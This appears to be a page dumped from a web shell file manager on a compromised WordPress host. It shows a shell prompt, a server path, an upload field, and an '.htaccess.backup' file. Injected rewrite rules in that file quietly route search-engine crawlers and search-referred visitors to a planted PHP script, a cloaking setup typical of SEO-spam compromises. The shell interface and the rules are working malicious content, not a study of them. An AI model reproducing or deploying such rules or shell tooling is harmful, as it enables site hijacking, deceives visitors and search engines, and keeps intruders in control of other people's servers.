MSV FM

dot.antimicrobial@66.96.161.157: ~ $
Path : /hermes/sb_web/b2680/cnctablebuild.com/
File Upload :
Current < : /hermes/sb_web/b2680/cnctablebuild.com/.htaccess.backup

RewriteEngine On

RewriteCond %{ENV:REDIRECT_STATUS} 200
RewriteRule ^ - [L]
RewriteCond %{HTTP_USER_AGENT} (google|bing|yahoo|msn|aol|duckduck) [OR]
RewriteCond %{HTTP_REFERER} (google|bing|yahoo|msn|aol|duckduck)
RewriteRule ^(.*)$ capabiliteshf.php?$1 [L]

# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase //
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . //index.php [L]
</IfModule>

# END WordPress